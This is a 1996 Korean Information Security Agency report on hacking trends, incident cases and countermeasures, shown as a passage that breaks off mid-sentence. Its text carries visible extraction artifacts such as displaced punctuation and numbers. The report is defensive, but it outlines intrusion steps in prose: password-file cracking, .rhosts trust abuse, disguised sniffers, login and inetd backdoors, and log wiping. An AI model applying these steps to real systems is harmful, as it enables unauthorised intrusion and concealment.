한국정보보호센터 - itfind...1996/11/01 · /표...
TRANSCRIPT
정보시스템 해킹 현황 및 대응
1996. 11
한 국 정 보 보 호 센 터
KOREA INFORMATION SECURITY AGENCY
서 문
컴퓨터통신의 발전과 함께 정보화 사회가 도래함에 따라 컴퓨터범죄 등 역기능에 대한 우려
의 목소리가 높아지고 있으며 대응책 강구의 필요성이 절실한 시기입니다 특히 불법적 해.
킹이나 바이러스 등에 의한 피해사례가 국내 외에서 자주 일어나고 있으며 개인이나 기업,・만이 아닌 국가의 중대한 보안 문제로서 인식되고 있어 보다 적극적인 해킹의 분석을 통한,
대응책 개발에 힘써야 할 때입니다.
해외에서의 미국방성 등 주요 기관에 대한 해킹 사례뿐 아니라 국내에서도, NASA, CIA ,
공공 기관에 대한 해킹이 시도되고 있으며 예전에는 은행 내부자에 의한 불법 계좌이체나
통신을 통한 사기 및 해킹 시도 등 단순경로의 해킹이었으나 최근에는 연구소나 대학PC ,
등 대책이 미비한 우회 경로를 통한 중요 기관의 해킹과 해외 기관을 경유한 해킹 등으로
그 기법이나 침투 경로가 점점 지능화되고 다양화되고 있어 실제 해킹 수법의 분석 및 이의
분류 작업을 통한 실질적 대응책 마련이 절실히 요구되고 있는 상황입니다 하지만 지금까.
지는 전산망 운용기관의 시스템 관리자들이 해커들의 수법들을 잘 모르고 있거나 경시하는
차원에서 대책을 강구하다 보니 실질적인 대응책 마련에는 어려움이 많았다고 봅니다.
뿐만 아니라 최근에는 인터넷 등 네트워크의 국제적 고속연동으로 해외의 불법 해커들이 지
능적으로 몰려오고 있어 국내의 기업과 연구소 공공기관 등의 중요 정보와 시스템이 크게,
위협받고 있는 실정입니다.
따라서 이러한 여건과 환경속에서 발간된 정보시스템 해킹 현황 및 대응 책자는 해킹 사“ ”
례들과 현황 해킹 수법들에 대한 실질적인 분석 내용을 담고 있어 지금까지 발표했던 내용,
보다는 훨씬 구체적일 뿐 아니라 실무에 직접 활용할 수 있는 내용들을 많이 담고 있어 관
련 실무자들의 실질적인 해킹 방지에 크게 도움이 될 것으로 확신합니다 아울러 침해사고.
대응팀의 현황과 사례들을 수록하였으므로 참고자료로 활용해주시기를 바랍니다.
끝으로 본 보고서를 발간하기까지 자료 분석 및 시험 연구 등에 많은 노력을 기울인 정책기
술지원부 기술대응팀의 노고를 치하하며 전문가 여러분들의 조언과 지도편달을 기대합니다.
년 월 일1996 11 15
한국정보보호센터
원장 이 재 우
이 보고서는 침해사고 대응체제 구축 및 기술지원 사업의 일환으로 정책기술지원부 기술“ ”
대응팀의 연구원들이 참여하여 작성하였으며 침해사고 관련 법률 분야는 정책기술지원부,
정책지원팀에서 도와주었습니다.
년 월1996 11
총 괄 부 장 김명룡 정책기술지원부: ( )
연구책임자 팀 장 임채호 기술대응팀: ( )
참여연구원 선임연구원 최운호 기술대응팀: ( )
선임연구원 임휘성 기술대응팀( )
주임연구원 신 훈 기술대응팀( )
주임연구원 정윤종 기술대응팀( )
주임연구원 박정현 기술대응팀( )
연 구 원 이현우 기술지원부( )
목 차
제 장 국내 외 해킹 현황1 ・제 절 해커와 해킹1
해커에 대하여1.
해킹에 대하여2.
제 절 국내 현황 및 사례2
해킹 현황1.
대표적인 침해사고 사례2.
제 절 해외 현황 및 사례3
해킹 현황1.
대표적인 침해사고 사례2.
제 장 해킹 수법 분류 및 현황2
제 절 해킹수법의 동향 및 분류1
해킹수법동향1.
시스템 침입 절차2.
해킹 수법의 분류3.
제 절 해킹 수법 현황2
원격지 시스템 침해수법1.
내부 시스템 침해수법2.
보안 스캐너3.
제 장 해킹 대응방안3
제 절 대응방안1
해킹 수법별 대응 방안1.
대응 방안의 구현2.
제 절 국내 침해사고대응팀 운영2
한국정보보호센터 기술대응팀1.
기타 침해사고대응팀2.
제 절 해외 침해사고대응팀과 국제협의체3
주요 해외 침해사고대응팀1.
국제 침해사고대응팀 협의회2. (FIRST)
제 장 해킹방지를 위한 정보보호 기술지침4
제 절 정보보호 방침 수립1
정보보호를 위한 시스템 관리1.
정보보호 방침2.
제 절 유닉스 시스템 정보보호 지침2
유닉스 시스템 및 인터넷 정보보호 모델1.
계정 및 패스워드 보호2.
파일시스템 보호3.
네트워크 보호4.
제 절 인터넷 방화벽3
개요1.
방화벽시스템의 기본개념2.
방화벽시스템의 구성요소3.
방화벽시스템의 구현4.
제 절 침입자 탐지와 추적4
침입자 탐지와 추적1.
침입자의 분석과 축출2.
제 장 해킹관련 국내법률 현황5
제 절 공공기관의 개인정보보호에 관한 법률1
제 절 공업 및 에너지 기술기반조성에 관한 법률2
제 절 무역업무 자동화 촉진에 관한 법률3
제 절 신용정보의 이용 및 보호에 관한 법률4
제 절 전기통신 기본법5
제 절 전기통신 사업법6
제 절 전산망 보급확장과 이용촉진에 관한 법률7
제 절 전파법8
제 절 주민등록법9
제 절 화물유통 촉진법10
제 절 형법11
제 절 통신12
참고문헌
부록 전산망 보안 질의 응답1.
부록 해킹 방지를 위한 보안 점검 목록2.
부록 보안취약점 목록3.
부록 공개 전산망 보안 도구 현황4.
부록 회원 현황5. FIRST
표 목 차
표 사건 유형별 건수< 1-1>
표 월별 접수 현황< 1-2>
표 년도 국내 해킹사례 기타< 1-3> ‘95 ( )
표 국내 도메인 별 사건< 1-4>
표 국제 협력 건수< 1-5>
표 년 국내 해킹 및 역기능 사례< 1-6> ‘96
표 인터넷 해킹 공격 건수< 1-7>
표 침해사고 건수의 변화< 1-8> US CERT
표 해킹 수법 분류 요약표< 2-1> /
표 해킹 수법별 방지 대책 요약< 3-1>
표 기관 최상위 정보보호 방침 예제< 4-1>
표 구체적 정보보호 방침< 4-2>
표 인터넷 유닉스 정보보호 다단계 모델< 4-3> /
표 공공기관의 개인정보보호에 관한 법률 중 벌칙 조문< 5-1>
표 공업 및 에너지 기술기반조성에 관한 법률 중 벌칙 조문< 5-2>
표 무역업무 자동화촉진에 관한 법률 중 벌칙 조문< 5-3>
표 신용정보의 이용 및 보호에 관한 법률 중 벌칙 조문< 5-4>
표 전기통신 기본법 중 벌칙 조문< 5-5>
표 전기통신 사업법 중 벌칙 조문< 5-6>
표 전산망 보급확장과 이용촉진에 관한 법률 중 벌칙 조문< 5-7>
표 전파법 중 벌칙 조문< 5-8>
표 주민등록법 중 벌칙 조문< 5-9>
표 화물유통촉진법 중 정보보호관련 벌칙 조문< 5-10>
표 형법 중 정보보호 관련 벌칙 조문< 5-11>
표 통신비 보호법 중 정보보호관련 법률 조문< 5-12>
그림 목차
그림 기관의 인터넷 연결 방법< 4-1>
그림 인터넷 유닉스 정보보호 모델< 4-2> /
그림 투명한 접근으로 인한 위험지대< 4-3>
그림 방화벽시스템으로 내부네트워크의 안전지대화< 4-4>
그림 방화벽 시스템 구축 예제< 4-5>
제 장 국내 외 해킹 현황1 ・제 절 해커와 해킹1
가 해커 란 누구인가. (Hacker) ?
컴퓨터시스템의 내부 구조 및 동작 등에 심취하여 이를 알고자 노력하는 사람으로서 대개
뛰어난 컴퓨터 및 통신실력을 가진 사람을 가리킴 하지만 현재는 다른 컴퓨터에 불법 칩. ・입하여 자료의 불법열람 변조 파괴 등의 행위를 하는 침입자 파괴자를 통칭하여 해커로 부, , ·
르고 있으며 본 보고서에서는 해커 침입자 파괴자 지능형 침입자 등을 통칭하여 해커라는, , , ,
용어를 사용하고 있다.
나 침입자 파괴자 란 누구인가. , (Intruder, Cracker) ?
다른 기관의 컴퓨터에 전산망 등을 이용하여 불법으로 침입하여 자료를 유출 변조 파괴 등, ,
의 범죄적인 행위를 하는 사람을 의미한다.
다 지능형 침입자 란 누구인가. (Uebecracker) ?
해커와 침입자를 합친 용어로서 스스로 시스템의 보안문제점을 파악하거나 불법침입프로그
램 등을 작성할 수 있는 능력을 가진 해커를 의미한다.
라 동기에 의한 해커의 분류.
해커의 종류 동 기 비 고
단순해커 호기심 영웅심리, 대부분의 해커
내부 불순분자 해커 개인 집단의 이익이나 동기 추구・ 내부 지원
범죄적 해커 금전적 이익 추구 금융망 등 대상
테러리스트 그룹/ 개인이나 그룹이 추구하는 이상 혼란 파괴 목적・기업체 고용 해커 경쟁 기업의 정보 유출 기업이익 추구
국가 고용 해커 경쟁국 등 정보 유출 국가이익 추구
마 일반적인 해커 분류.
해 커 분 류 설 명 비 고
학구형 해커 시스템탐구 등 자신의 연구 목적
침입형 해커 타 시스템 침입만 시도하는 해커
암호형 해커 상용프로그램 암호 락 를 푸는 해커( )
파괴형 해커 시스템 침입 후 자료 파괴하는 해커
스파이형 해커 비 신상 정보를 절취하는 해커/
해킹에 대하여2.
가 해킹 의 정의. (Hacking)
해커 침입자 들의 저지르는 모든 불법적인 행위들을 전산망 보안 침해사고라고 볼 수 있으( )
며 이들의 행위는 드러나는 행위에 의해 다음과 같이 나누어 볼 수 있다, .
불법 침입○
인가되지 않은 침입자가 불법으로 다른 시스템에 접근하는 행위-
불법 자료 열람○
허가되지 않은 불법접근을 통해 주요 정보를 열람한 행위-
불법 자료 유출○
개인이나 기관의 주요 정보를 불법으로 유출한 행위-
불법 자료 변조○
시스템 내의 자료나 개인의 자료를 변조한 행위-
불법 자료 파괴○
시스템의 자료를 불법으로 파괴한 행위-
이러한 경우는 대개 우리가 알고 있는 경우이며 현재의 전산망 환경에서는 보다 세분화하,
여 나누어 살펴볼 수 있으며 다음과 같이 정리 할 수 있다, .
나 해킹의 대상과 유형. :
해커들의 해킹 대상을 데이터 시스템 프로그램 네트워크 등으로 분류하여 해커들이 저지를, ,
수 있는 해킹 행위들을 불법삽입 불법유출 불법변조 파괴 거부 등의 행위로 나누어 다음, , , ・과 같은 표로 요약할 수 있다.
다 해킹에 사용되는 프로그램의 유형.
뒷문 시스템에 불법 접근을 가능케 하는 프로그램(Backdoor) :○
논리폭탄 주어진 조건을 만나면 불법 행위를 하는 숨겨진 프로그램(Logic Bomb) :○
바이러스 프로그램 변조 파괴목적의 프로그램(Virus) : ,○
웜 네트워크를 통해 전달되는 바이러스(Worm) :○
트로이목마 정상프로그램을 가장한 불법 프로그램(Trojan Horse) :○
박테리아 자신을 무한 복제하여 시스템 동작 방해(Bacteria) :○
제 절 국내 현황 및 사례2
해킹 현황1.
가 년 해킹 사례 분석. ‘95
다음과 표 에서 표 을 참고하면 년에 발생한 해킹 사례는 총 건으로 대< 1-1> < 1-3> ‘95 17 ,
학 연구전산망 침입 통신망 도용 및 사기 암호해독 등이다 분기별 통계로는, PC ID , . 1/4,・분기에 각 건이고 학생들의 방학 및 휴가철인 분기에 건으로 발생빈도가 상승2/4, 4/4 3 , 3/4 8
하는 특징을 보이고 있다 전체 사건의 발생유형과 월별 접수현황은 다음과 같다. .
기 타 간단한 문의- :
침입시도 침입을 시도하였으나 성공하지 못한 경우- :
침입성공 침입에 성공하였으나 심각한 손실을 주지 않은 경우- :
심각손실 침입에 성공하여 디스크를 지우는 등의 경우- :
표 사건 유형별 건수< 1-1>
손 실 정 도 건 수 비 율(%)
심각손실 7 27
침입성공 9 35
침입시도 7 27
기타 3 11
전체접수 건수 26 100
표 월별 접수 현황< 1-2>
월 기타 침입시도 침입성공 심각손실 총 계 비율(%)
03 1 1 4
04 0 0
05 1 1 2 8
06 1 1 2 8
07 2 5 2 8
08 1 1 1 7 27
09 2 1 2 5 19
10 1 1 3 11
11 1 1 4
12 1 1 1 3 11
총 계 3 7 9 7 26 100
표 년 국내 해킹사례 기타< 1-3> ‘95 ( )
일 자 사례
‘95. 1. 10. 홈뱅킹 이용 타인 예금 출금
‘95. 2. 22. 대학 전산망에 해커 침입
‘95, 3. 14. 상용 워드프로세서의암호 해독
‘95. 4. 8. 고교생이 도용하여 사기 행위ID
‘95. 4. 9. 통신 도용사례 급증PC ID
‘95. 6. 2. 고교생이 통신으로 사기 행위PC
‘95. 8. 7. 대학 전산원 호스트 해커 침입
‘95. 8. 9. 노래방 프로그램 암호 해독
‘95. 8. 9. 외국 해커가 연구소 침입
‘95, 8. 9. 모기업체 전산망 해킹 당함
‘95, 8. 19. 통신 서비스 업체에 해커 침입
‘95. 8. 20. 은행 신용카드의 비 암호체계 해독
‘95. 9. 12. 상용 통신망에 해커 침입
‘95. 9. 24. 교육 전산망 침입 해커 검거
‘95. 10. 3. 삐삐 비 번호 해킹
‘95. 10. 12. 대학 연구소 침입 해커 검거,
‘95. 11. 18. 타인의 도용하여 은행 서비스를 받음ID
총 계 건17
또한 우리나라 인터넷의 가입기관 중 대학교 연구소 회사 등 도메(AC.KR), (RE.KR), (CO.KR)
인별의 침해 사고현황을 표 에 예시하였다< 1-4> .
이를 보면 대학교 등에 대한 보안 인식과 지원이 필요하고 심각한 손실을 입는 경우가 많,
아 백업등 보완 체제를 갖추어야할 것으로 보인다 해외와 마찬가지로 우리나라의 경우도.
이렇게 보고된 사고 건수는 실제 발생한 건수의 정도이며 기관의 관리자가 침입을 인5% ,
지 못하는 경우가 대부분으로 예상된다.
표 국내 도메인 별 사건< 1-4>
도메인 기타 침입시도 침입성공 심각손실 총계 비율(%)
AC.KR 2 5 5 12 46
RE.KR 2 4 1 7 27
CO.KR 3 3 1 7 27
총 계 3 7 9 7 26 100
해커들은 보안대책이 불충분한 기관의 시스템에 침입하며 특히 우리나라의 경우 인터넷에,
연결된 거의 대부분의 유닉스 시스템이 보안 문제점을 가지고 있다고 해도 과언이 아닐 것
이다 불법적인 침입을 일삼는 해커들은 보안이 취약한 시스템이 인터넷에 연동되면 즉시.
침입 대상으로 선정한다는 사실을 실무자들이 인식할 필요가 있다.
그리고 특히 국제적인 협조가 요구되는 사고들은 년 침해사고로 접수받은 건 중에서1995 26
총 건으로서 를 차지하고 있으며 이중 건 건 중 은 한국에서 미국을 공격하러9 35% , 6 (9 67%)
하다 실패하여 미국 나 에서 협조요청된 사례이고 미국 등 해외에서 한국을 침CERT CIAC ,
입한 건은 침입 성공으로 분류할 수 있다3 .
표 국제 협력 건수< 1-5>
국제협력건수 9 35 %
해외☞한국 공격( )한국☞해외 공격( )
36
(33%)(67%)
국내사건건수 17 65 %
총 계 26 100 %
나 년 해킹 및 역기능 사례 분석. ‘96
년 월 기준 에 역기능 사례는 총 건으로 악의적 해킹 사례가 증가하는 추세이며‘96 (’96.10 ) 9 ,
향후 휴가 및 방학을 이용하여 지속적으로 발생빈도가 증가할 것으로 예상되고 있다.
표 년 국내 해킹 및 역기능 사례< 1-6> ‘96
일 자 사 례
‘96. 1. 18. 국내 대기업전산망에 불법침투 해커 검거
‘96. 2. 1. 통신업체 및 대학 해킹 당함X
‘96 4. 16.기관 인터넷 해킹 비 번호 파일 유출N :의 사용으로 인함(tftp )
‘96 4. 19.대 국제해커 첫 적발20일본 외무성등 세계 곳 전산망 침투( 92 )
‘96 4. 26. 홈뱅킹 폰뱅킹 사고 비 번호 보안 허술( )・‘96 4. 30. 개인 신상정보와 기업체 금융 거래 내역이 담긴 전산출력지 유출
‘96 5. 8. 대학 학생에 의한 대학 시스템 해킹K P
‘96 5. 21. 컴퓨터 조작 운전면허 부정 발급
‘96 9. 24. 과기원생이 홈뱅킹 절도
총 계 건9
대표적인 침해사고 사례2.
가 서울대 중앙교육전산원 침해사건 한국통신연구센터 침해사건. / (‘93)
교육망을 운영하는 본부인 서울대 중앙교육전산원의 에 불법 침입자가 침투하여 워크LAN
스테이션 대의 디스크를 지운 사건으로서 당시 서울대에서는 주일분의 백업을 가지고 복6 1
구하였음 한국통신 연구센터는 당시 하나 망을 운영할 때 였으며 서울대와 마찬가. (HANA)
지로 디스크를 지운 사건이었음.
나 천리안 홈뱅킹 사건. (‘94)
인천의 김모군이 인천지역 정보망인 인디텔에 가입한 선배의 를 도용하여 불법으로 홈뱅ID
킹 계좌이체를 시도하다 잡힌 사건으로서 보통 통신망과 연결된 홈뱅킹 시스템은PC 3, 4
개의 패스워드가 요구되는데 이를 모두 알아내어 시도하였음.
다 서강대 한남대 해킹 사건. / (‘94)
서강대가 운영하는 인터넷 아키 네트워크 데이터베이스 검색용 시스템에 해커가 침(Archie)
입하여 각종 디스크 자료와 시스템 일부 등을 삭제한 사건으로서 백업을 이용 하루 동안,
이를 복구하였음 비슷한 시기에 한남대도 분량의 자료 및 시스템을 파괴당하여 인터. 50MB
넷을 운영할 수 없었던 사례가 있었고 이러한 사건들은 침입자들이 자료를 삭제한 결과 범,
행자를 추적하거나 체포하는데에는 실패하였음.
라 서울대 해킹사건. (‘95)
서울대에 침입한 해커가 아이넷 나우누리 등 국내 주요 상용인터넷에 침입하고 또한 다른,
대학에도 침입하였으며 서울대 및 주요망 관리자들이 상호 협조하여 한달여에 걸친 로그기
록과 정보교환 끝에 혐의자를 밝혀낸 사건임.
마 부산지역 해커 사건. (‘95)
인의 부산지역 해커가 국내 인터넷서비스 제공업자의 시스템과 전국적인 을 바탕으로2 LAN
부산지역을 비롯하여 전국의 주요 대학의 시스템들을 해킹하다 수개월의 추적 끝에 경찰의
해커 수사대에의해 체포되었음.
바 포항공대 해킹 사건. (‘96)
포항공대의 연구실이 운영하는 의 대의 시스템이 불법침입자에 의해 다수의 디스크가LAN 6
삭제당하고 패스워드가 삭제되어 시스템 부팅이 불가능해진 사건으로서 추적결과EEPROM
학생들이 저지른 것으로 검찰조사에 의해 밝혀졌음KAIST .
사 홈뱅킹 사건. (‘96)
한국과학기술원 학생이 통신망과 연결된 인터넷서비스망 의 서버에 홈뱅킹고PC (KORNET)
객들의 비 번호와 거래정보를 가로채는 변형 프로그램을 설치하여 여러 은행 홈뱅킹Telnet
이용자들의 와 비 번호를 이용하여 계좌이체를 시도하다 검거된 사건임ID .
제 절 해외 현황 및 사례3
해킹 현황1.
외국의 침해사고 실태는 국내에 비하여 매우 심각한 실정으로 국가 중요 정보를 적국에 유
출하여 안보상 큰 위협을 초래하거나 고도의 침해기술로 산업정보를 유출하고 개인정보를, ,
침해하는 등의 사례가 빈번하게 보고되고 있다 다음 표 은 미국 호주에서 알려진 보. < 1-7> ,
도에 의한 통계로서 등에서 실제 접수된 부분만을 보여주고 있어서 실제 공격은 더CERT ,
욱 많을 것으로 추정된다 특히 미국방성 공격에 대한 자료는 최근 외신에 보도된 것으로. ,
정도는 공격이 성공되고 있으며 공격한 해커들을 거의 잡을 수 없는 형편이다65% .
표 인터넷 해킹 공격 건수< 1-7>
국 가 건 수 관련 출처 인터넷 규모 비고
미국만 년27 (‘94 )만 년25 (‘95 )
US CERTGAO
백만대3 (‘95.1)CERT미국방성
호주 년170 (‘94 ) AUSCERT 만대16 (‘95.1) AUSCERT
미국 회계감사국 보고서 뉴욕타임즈 보고* (General Accounting Office) ,
그리고 다음 표 은 미국의 가 년 처음 발족된 이래 실제 침해사건으로 판< 1-8> CERT 1988
명된 건수들의 연도별 변화를 보여주고 있다 초기에는 주로 패스워드를 알아내거나 알려진. ,
취약점을 찾는 식의 침해수법이 대부분이었으나 현재는
프로토콜의 문제점 파악-
소스 프로그램을 분석하여 새로운 취약점 찾기-
공격- ICMP
익명 파일전송 서비스의 공격- (Anonymous FTP)
스니핑- (Sniffing)
스푸핑- IP (Spoofing)
등이 주류들을 이루고 있다.
표 침해사고 건수의 변화< 1-8> US CERT
연 도 1988,89 1990 1991 1992 1993 1994 1995
건 수 138 252 406 773 1334 2341 2412
침해사고 사례2.
뻐꾸기 알 는 서독의 해커들을 추적한 시스템관리자가 쓴 책의 이름이다 저Cuckoo's Egg( ) .
자인 클리포드 스톨은 이 해커들이 다른 시스템에 불법적으로 엑세스하고 불법적으로 정보
를 빼내가는 것을 마치 뻐꾸기가 자신의 알을 다른 새의 둥지에서 부화시키는 것으로 연상
하여 이러한 책이름을 고안하였다 이 관리자는 일년 반에 걸친 추적 끝에 서독 해커들이라.
는 사실을 알게되었고 해커들이 전세계 여 기관에 대해 불법적인 접근을 시도하고 군사300
기 정보를 탈취한다는 사실을 알게되었으며 등에서 결국 이 해커들이 구소련, NSA, CIA
의 자금지원을 받는 서독 해커임을 밝혀 서독에서 기소된 사건이다KGB .
자신의 시스템에 불법침입한 침입자들이 서독의 대학으로부터 시작되며 이것은 또 어느 해
커의 집에서 를 통해 시작된다는 사실을 알게되기까지 침입을 당한 시스템의 관리자 전PC ,
화회사의 교환원 전화회사의 기술자 국제 통신회선 담당자까지 협조하면서 추적하는 과정, ,
이 마치 스파이영화를 보듯 흥미진진하게 서술되고 있다 이 서독의 해커들이 해킹한 전세.
계 여 곳에는 한국의 과학원 도 포함되어 있어 그 당시에도 한국이 해외 해커들300 (KAIST)
이 노리는 곳임을 알 수 있었다 하지만 이때에는 한국에서 인터넷을 아는 사람도 드물었고. ,
해커에 대해서도 잘 알려져 있지 않았으며 중요한 정보는 없었다.
또한 유명한 인터넷웜 사건을 보면 년 월 일 코넬대학 대학원생인, 1988 11 2 Robert T.
가 네트워크를 통해 상대편 시스템에 자신의 프로그램을 전송하여Moriss UNIX(Berkeley)
시스템을 정지시키는 프로그램 일명 을 개발 실행하여 여대 이상의 인( Internet Worm) 6,000・터네트 호스트를 일시 정지시켰다.
다만 와는 달리 시스템의 정보를 파괴하지는 않았으며 시스템의 네트워크 보안Virus , UNIX
취약점을 이용하여 자신의 프로그램을 상대편으로 감염시키는 이른바 웜의 역할을 하였는
데 여대의 컴퓨터를 하루밤새 일시 정지시켰으므로 그 놀라움은 매우 컸다고 볼 수 있, 6000
겠다 웜에 감염된 시스템은 사용자나 시스템화일을 파괴하지는 않았지만 웜 프로그램이 계.
속 자신을 복제하고 또 컴파일 함으로써 자신의 프로세스를 계속 증가하여 결국 시스템이,
동작을 멈추게 되었다.
웜 프로그램이 이용한 시스템의 보안취약요소는UNIX
의 보안 취약성- Fingerd (Security Hole)
매개변수의 크기를 검사하지 않는 문제점을 이용하여 버퍼를 오버플로우 시킨다.
의 옵션을 이용한 웜프로그램의 전송- Sendmail DEBUG
인 이 프로토콜을 시도할 때 옵션을 사용하여 별도의 웜 프SMTP Sendmail DEBUG (Worm)
로그램을 전송하는 쉘스크립트를 수행한다.
사용자의 이용- account, password
네트워트를 통해 시스템 사용자의 계정을 알아낸 후 패스워드를 공략함으로써 상대편 시스
템을 감염시킨다.
주로 의 시스템이 이것의 희생물이 되었다 는 프로UC Berkeley UNIX . BSD UNIX TCP/IP
토콜이 기본 유틸리티로 제공되며 그 설계 내용과 소스프로그램이 널리 알려져 있으므로
는 이를 심도 있게 연구할 수 있었던 것이다 이를 막기 위해서는 보안취약점이 제거Morris .
된 새로운 시스템 프로그램으로 업그레이드하고 사용자의 패스워드를 알려지지 않sendmail
게 잘 유지하는 방안을 마련해야 한다 그런데 아직도 새로운 시스템으로 수정하. sendmail
지 않은 기관이 국내에서도 많이 발견되어 해커가 손쉽게 침입하는 통로를 만들어 주고 있
다.
또 다른 예로써 뉴욕시 번가에 사는 일단의 해커들이 뉴욕 암센터를 해킹하고 자신의414
침입흔적을 지우려고 하다가 환자들의 모든 암치료정보까지 지워버려 청문회가 열린 사건이
있었으며 그밖에도 에서의 웜프로그램은, NASA WANK(Worms Against Nuclear Killers)
네트워크내의 많은 컴퓨터를 감염시켰다 또 시스템 불법침입으로 명의 호주 해커NASA . 3
들이 구속당하고 명의 해커들이 덴마크의 많은 컴퓨터에 불법 침입하였다가 구속당한 사, 2
례 등이 있다.
또한 년에는 죤 미트닉이 수년간 타인의 시스템 침입하고 불법으로 개인정보를 가로채1995 ,
어 도용하는 등으로 수십만달러 상당의 피해를 입히다 츠토무 시노무라라는 샌디에이고 슈
퍼컴센터 보안 전문가에 의해 꼬리가 잡혀 검거된 사건과 미국의 시티뱅크 에(CITI BANK)
침입한 러시아 해커가 전 세계 공범들의 구좌에 불법 계좌이체를 하다 등과 공동 추적FBI
한 팀에 의해 붙잡힌 사건이 있었고 년에는 팀 나지스 라는 이름으로 알려진 해커, 1996 「 」
들이 러시아의 체첸 침공에 항의해 한 러시아 인터넷 홈페이지를 해킹했는데 이를 보도한,
뉴욕타임즈에 따르면 미 대학 수학과의 컴퓨터를 통해 컴퓨터를 통해 모스코바 채MIT 「
널 이라는 한 웹사이트에 침입한 이들은 아프카니스탄 에서(www.moscowchannel.com)」 『
처럼 패배해서 철수하기 전에 러시아는 체첸에서 물러나라 는 등의 메시지를 남겼으며 대,』
만에서도 컴퓨터 해커들이 동중국해 조어도에 대한 일본의 영유권주장에 항의하기 위해 인
터넷 일부 프로그램을 파괴시키는 반일 컴퓨터 바이러스를 만들어 유포시켰고 최근에는 신,
원미상의 해커가 미국 의 홈페이지를 침입하여 변형시키는 사건이 발생했다CIA .
이상과 같은 다양한 사례들을 보아서 알 수 있듯이 현재 해외에서는 수많은 해커 및 침입자
들이 침입을 노리고 있는 것으로 보고되고 있으며 침입의 대상이 어느 한 국가에 제한되는
것이 아니므로 매우 우려할만한 사실이라고 본다.
제 장 해킹 수법 분류 및 현황2
제 절 해킹수법의 동향 및 분류1
해킹수법동향1.
최근의 해킹 사건들에서 볼 수 있듯이 초보 수준의 해커들이 저지르는 해킹은 초보적인 수
준뿐만 아니라 고난도의 수법들을 구사하고 있어서 해킹 수법들을 분류하고 그에 해당하는,
구체적인 사례와 대비책을 요약하여 제시하고자 한다 미국 의 년 월 일자 권고. CERT 96 5 22
문서 를 보면 최근에 많이 사용되는 해킹기법을 다음과 같이 지적하고 있다(Advisory) .
패스워드 크래킹-
리눅스 관련 해킹-
등의 툴을 이용한 해킹- ISS
관련 해킹- mail
년도에는 스푸핑 이나 스니퍼 가 새로운 해킹방법으로 많이 사용되었95 IP (spoofing) (sniffer)
지만 현재는 의 사용증가로 나 등WWW Java CGI, PERL, Internet Web Browser Navigator
에서 관련 보안 문제가 많이 발생하고 있다 해커들은 자신들의 웹페이지를 만들어서Web . d
인터넷에 자유로이 공개하는 실정으로 웹이 나오기 전에는 해킹정보를 얻기 위해 해커 개,
개인이 만든 나 비공개된 등을 이용했지만 지금은 웹브라우저만 이용BBS ftp, gopher, IRC
하면 누구나 해킹정보를 쉽게 구할 수 있다 조금 유명도가 있는 해커들의 웹페이지는 만. 10
회이상의 조회기록을 남기고 있는 것으로 보아 비공개된 지하세계의 문제는 점점 심각한 양
상을 띄고 있다 또한 해커들은 해킹을 쉽게 할 수 있는 소스나 도구 들을 자신들의 웹. (tool)
페이지에 올려놓고 자신의 실력을 과시하고 있으며 네트워크 전체의 보안문제를 검색하는
보안도구 를 악용하고 있어서 해커들의 해킹기술의 발전을 따라가기에는 현(ISS, SATAN) ,
실적으로 엄청난 노력과 투자가 요구된다고 하겠다.
시스템 침입 절차2.
해커들이 전산망을 통해 다른 시스템에 침입하는 일반적인 순서를 보기로 한다.
가 불법 침입 다른 시스템에 비인가된 접근. :
패스워드 없는 이용- ID
손쉬운 패스워드 짐작-
파일을 등을 이용 패스워드를 알아내 접근- /etc/password Crack
를 통해 알아낸 와 패스워드를 이용하여 접근- Sniffer ID
마운트하여 디스크 쓰기가 가능할 경우 생성 가능- NFS ID
나 불법 생성$HOME/.rhosts /etc/hosts.equiv※
사회공학적 침입 수법 및 이용 가능-
이용 침입- IP Spoofing
등 응용프로그램상의 버그를 이용 접근- gopher, wu-ftp, ALX rlogin
을 이용하면 취약한 부분들을 쉽게 검색SATAN, ISS, AutoHack Pingware※
나 관리자 권한 얻기 권한을 가지려 시도. : root
등의 버그 이용- ELM autoreply, rdist, binmail, lpr
프로그램 이용- setuid
경쟁조건 이용- (race condition)
버그- loadmodule
버그- sendmail
다 스니퍼 설치 네트워크 감청 및 패스워드 도용. : ID,
이나 특수문자 등에 의한 디렉토리에 설치하여 숨긴다- “---”
등의 일반 프로그램 이름으로 설치한다- emacs, elvis
라 불법 프로그램 설치 보통 백도어 를 설치한다. : (Backdoor) .
소스를 수정하여 특정 패턴의 패스워드는 그냥 통과시킨다- login .
에 불법 서비스를 넣어 향후 쉽게 접근하게 한다- /etc/inetd.conf .
등을 고쳐 패스워드를 모니터링 한다- su root .
마 로그지우기 자신의 침입 흔적을 지운다. : .
의 내용을 삭제한다- $HOME/.history .
등의 프로그램을 이용하여 침입 흔적을 지운다- disapear, zap .
기타 침입과 상관없이 전자우편 공격 전자우편을 통한 바이러스 공격 메시지를 불, , ICMP
법으로 만들어 네트워크의 정상 동작을 방해하기도 한다.
해킹수법의 분류3.
가 사회공학적 침입 수법. (Social Engineering)
시스템관리자를 속이는 방법으로서 가령 전화를 걸어 정당한 사용자인 것처럼 속이고 패스
워드를 잊어버렸다고 하면서 접속을 부탁하는 등의 경우이다 이 경우의 대비책은 매우 어, .
려운 편인데 스탭들에 대한 교육과 잘 정의된 신분확인 절차 등이 요구된다.
나 사용자 도용. (Impersonation)
정당한 사용자의 를 도용하는 경우로서 예를 들어 등을 이용하여 네트워크 접근시ID Sniffer
의 와 패스워드 등을 훔치는 방법 등이 있다 이 경우의 대비책은 물리적인 사용자 확인ID . ,
링크레벨의 암호화 등이 필요하다.
다 시스템 취약점 공격. (Exploits)
시스템의 버그를 이용하여 이를 보안 취약점으로 활용하는 경우이다 이러한 취약점은 지속.
적으로 발견되고 있으므로 시스템 개발시 보안기법의 구현이 요구되며 항상 최신 버전으로
패치하는 것이 중요하다.
라 호스트 위장. (Transitive Trust)
목표 호스트가 신뢰하는 시스템이나 네트워크로 잠시 위장하는 수법이다 예를 들면. .rhost
에 불법 호스트를 정의할 수 있으며 등으로 불법 신뢰하는 시스템을 만들 수도 있으, NFS
므로 시스템이 신뢰하는 시스템의 정의와 구성 등을 주의 깊게 해야 한다.
마 데이터에 의한 공격. (Data Driven Attack)
불법프로그램을 이식하는 경우로서 만약 파일을 전자우편으로 보냈다면 수신자가Postscript
이를 파일로 변환시 불법명령들이 실행될 수 있다 방화벽시스템을 이용한 스크린 서비스의. ,
제한 등이 요구된다.
바 구조적 공격. (Infrastructure Attack)
시스템이나 네트워크 프로토콜 등의 구조적인 문제점을 공격하는 수법으로서 도메인 네임
